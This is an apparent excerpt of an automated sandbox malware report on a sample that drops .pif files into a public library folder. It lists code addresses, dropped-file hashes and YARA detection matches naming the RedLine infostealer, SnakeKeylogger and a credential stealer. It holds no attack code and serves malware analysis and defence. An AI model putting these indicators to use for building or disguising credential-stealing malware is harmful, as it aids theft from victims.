Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2930A807	3_2_2930A807
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29307608	3_2_29307608
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2930FC78	3_2_2930FC78
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2930CA78	3_2_2930CA78
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29309878	3_2_29309878
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2930FC68	3_2_2930FC68
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2930E058	3_2_2930E058
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29307C58	3_2_29307C58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2930AE58	3_2_2930AE58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29300040	3_2_29300040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2930AE47	3_2_2930AE47
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29309EB8	3_2_29309EB8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2930D0B8	3_2_2930D0B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2930E698	3_2_2930E698
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29308298	3_2_29308298
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2930B498	3_2_2930B498
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29300E87	3_2_29300E87
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2930B488	3_2_2930B488
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2930D6F8	3_2_2930D6F8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2930A4F8	3_2_2930A4F8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293004FA	3_2_293004FA
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293088D8	3_2_293088D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2930BAD8	3_2_2930BAD8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2931E1C8	3_2_2931E1C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29316440	3_2_29316440
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2931CA90	3_2_2931CA90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29316120	3_2_29316120
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29312F20	3_2_29312F20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29314500	3_2_29314500
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29311300	3_2_29311300
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29313560	3_2_29313560
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29310360	3_2_29310360
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29314B40	3_2_29314B40
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29311940	3_2_29311940
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2931034F	3_2_2931034F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29313BA0	3_2_29313BA0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293109A0	3_2_293109A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29315180	3_2_29315180
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29311F80	3_2_29311F80
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293141E0	3_2_293141E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29310FE0	3_2_29310FE0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293157C0	3_2_293157C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293125C0	3_2_293125C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29314820	3_2_29314820
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29311620	3_2_29311620
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2931F428	3_2_2931F428
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29310013	3_2_29310013
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2931F418	3_2_2931F418
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29312C00	3_2_29312C00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29315E00	3_2_29315E00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29314E60	3_2_29314E60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29311C60	3_2_29311C60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29313240	3_2_29313240
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29310040	3_2_29310040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293154A0	3_2_293154A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293122A0	3_2_293122A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29313880	3_2_29313880
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29310680	3_2_29310680
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29315AE0	3_2_29315AE0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293128E0	3_2_293128E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29313EC0	3_2_29313EC0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29310CC0	3_2_29310CC0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29320AB8	3_2_29320AB8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29322DB0	3_2_29322DB0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293203B8	3_2_293203B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2932A630	3_2_2932A630
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293226B0	3_2_293226B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293218B0	3_2_293218B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29329CF4	3_2_29329CF4
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29321FB0	3_2_29321FB0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29323E90	3_2_29323E90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293211B0	3_2_293211B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2932B05A	3_2_2932B05A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29320AA8	3_2_29320AA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29322DA1	3_2_29322DA1
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29320006	3_2_29320006
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29320040	3_2_29320040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293203A8	3_2_293203A8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293226A2	3_2_293226A2
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293218A2	3_2_293218A2
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29329CE8	3_2_29329CE8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29321FA1	3_2_29321FA1
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29329168	3_2_29329168
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29329158	3_2_29329158
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_293211A0	3_2_293211A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_2932B5D0	3_2_2932B5D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29AFCCB9	3_2_29AFCCB9
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29AFDB60	3_2_29AFDB60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29AFDB54	3_2_29AFDB54
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_29AF64B8	3_2_29AF64B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_00408C60	3_1_00408C60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_0040DC11	3_1_0040DC11
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_00407C3F	3_1_00407C3F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_00418CCC	3_1_00418CCC
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_00406CA0	3_1_00406CA0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_004028B0	3_1_004028B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_0041A4BE	3_1_0041A4BE
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_00408C60	3_1_00408C60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_00418244	3_1_00418244
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_00401650	3_1_00401650
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_00402F20	3_1_00402F20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_004193C4	3_1_004193C4
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_00418788	3_1_00418788
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_00402F89	3_1_00402F89
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_00402B90	3_1_00402B90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_004073A0	3_1_004073A0
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 4_2_028E20C4	4_2_028E20C4
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_3_2D02EB02	7_3_2D02EB02
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_00408C60	7_2_00408C60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_0040DC11	7_2_0040DC11
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_00407C3F	7_2_00407C3F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_00418CCC	7_2_00418CCC
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_00406CA0	7_2_00406CA0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_004028B0	7_2_004028B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_0041A4BE	7_2_0041A4BE
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_00408C60	7_2_00408C60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_00418244	7_2_00418244
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_00401650	7_2_00401650
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_00402F20	7_2_00402F20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_004193C4	7_2_004193C4
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_00418788	7_2_00418788
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_00402F89	7_2_00402F89
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_00402B90	7_2_00402B90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_004073A0	7_2_004073A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_299D1558	7_2_299D1558
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_299D1560	7_2_299D1560
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_299D12B7	7_2_299D12B7
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_299D12C0	7_2_299D12C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FF5822	7_2_29FF5822
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FFABD0	7_2_29FFABD0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FFBA7F	7_2_29FFBA7F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FFBD61	7_2_29FFBD61
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FF8F18	7_2_29FF8F18
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FFAF00	7_2_29FFAF00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FF5E58	7_2_29FF5E58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FF41EA	7_2_29FF41EA
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FFB1DF	7_2_29FFB1DF
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FFC040	7_2_29FFC040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FFB4C0	7_2_29FFB4C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FFD490	7_2_29FFD490
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FFB7A0	7_2_29FFB7A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FFAC20	7_2_29FFAC20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FFF0D7	7_2_29FFF0D7
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FF3068	7_2_29FF3068
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FFE5E8	7_2_29FFE5E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_29FFE5E3	7_2_29FFE5E3
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF08550	7_2_2DF08550
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF03508	7_2_2DF03508
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF00040	7_2_2DF00040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF00738	7_2_2DF00738
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0FB00	7_2_2DF0FB00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF00E38	7_2_2DF00E38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF07A28	7_2_2DF07A28
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0EDF8	7_2_2DF0EDF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0EDE9	7_2_2DF0EDE9
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0B9D8	7_2_2DF0B9D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0B9C8	7_2_2DF0B9C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0E9A0	7_2_2DF0E9A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0E99A	7_2_2DF0E99A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0B580	7_2_2DF0B580
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0B56F	7_2_2DF0B56F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF08540	7_2_2DF08540
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0E548	7_2_2DF0E548
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0E538	7_2_2DF0E538
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0E0F0	7_2_2DF0E0F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0E0E0	7_2_2DF0E0E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0DC98	7_2_2DF0DC98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF07080	7_2_2DF07080
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0DC89	7_2_2DF0DC89
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0D840	7_2_2DF0D840
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0D839	7_2_2DF0D839
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF00014	7_2_2DF00014
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0D3E8	7_2_2DF0D3E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0D3D8	7_2_2DF0D3D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0CF90	7_2_2DF0CF90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0CF84	7_2_2DF0CF84
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0CB38	7_2_2DF0CB38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0CB28	7_2_2DF0CB28
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF00729	7_2_2DF00729
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0FAF4	7_2_2DF0FAF4
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0C6E0	7_2_2DF0C6E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0C6D0	7_2_2DF0C6D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0F6A8	7_2_2DF0F6A8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0F69A	7_2_2DF0F69A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0C288	7_2_2DF0C288
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0C27A	7_2_2DF0C27A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_2DF0F250	7_2_2DF0F250

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\Aiymwhpj.PIF 03B17E6FE6CE874C0CF78B2E560F5FB4106E07CE33799632B2E1BBF24E9FB371
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\jphwmyiA.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: String function: 02948798 appears 54 times
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: String function: 0294881C appears 45 times
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: String function: 029344AC appears 74 times
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: String function: 0293480C appears 931 times
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: String function: 029344D0 appears 33 times
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: String function: 029346A4 appears 244 times
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: String function: 0040D606 appears 72 times
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: String function: 0040E1D8 appears 129 times
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: String function: 028E480C appears 619 times
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: String function: 028F8798 appears 48 times
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: String function: 028E46A4 appears 154 times

Source: yxU3AgeVTi.exe, 00000000.00000003.1681344147.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs yxU3AgeVTi.exe
Source: yxU3AgeVTi.exe, 00000000.00000003.1681344147.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs yxU3AgeVTi.exe
Source: yxU3AgeVTi.exe, 00000000.00000002.1707069184.00000000213AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs yxU3AgeVTi.exe
Source: yxU3AgeVTi.exe, 00000000.00000002.1707069184.00000000213A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs yxU3AgeVTi.exe
Source: yxU3AgeVTi.exe, 00000000.00000002.1708111218.00000000215F2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs yxU3AgeVTi.exe
Source: yxU3AgeVTi.exe, 00000000.00000003.1680843754.000000007F410000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs yxU3AgeVTi.exe
Source: yxU3AgeVTi.exe, 00000000.00000002.1709048620.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs yxU3AgeVTi.exe
Source: yxU3AgeVTi.exe, 00000000.00000002.1707383794.00000000214AA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs yxU3AgeVTi.exe
Source: yxU3AgeVTi.exe, 00000000.00000003.1681562760.0000000000823000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs yxU3AgeVTi.exe
Source: yxU3AgeVTi.exe, 00000000.00000002.1702289482.000000002069B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs yxU3AgeVTi.exe
Source: yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs yxU3AgeVTi.exe
Source: yxU3AgeVTi.exe, 00000000.00000003.1681660647.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs yxU3AgeVTi.exe

Source: yxU3AgeVTi.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 7.2.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.2.Aiymwhpj.PIF.213367a8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.1.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.jphwmyiA.pif.25350ee8.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.jphwmyiA.pif.25350ee8.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.jphwmyiA.pif.25350ee8.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.jphwmyiA.pif.29cc99de.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.jphwmyiA.pif.29cc99de.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.jphwmyiA.pif.29cc99de.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.jphwmyiA.pif.250b99de.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
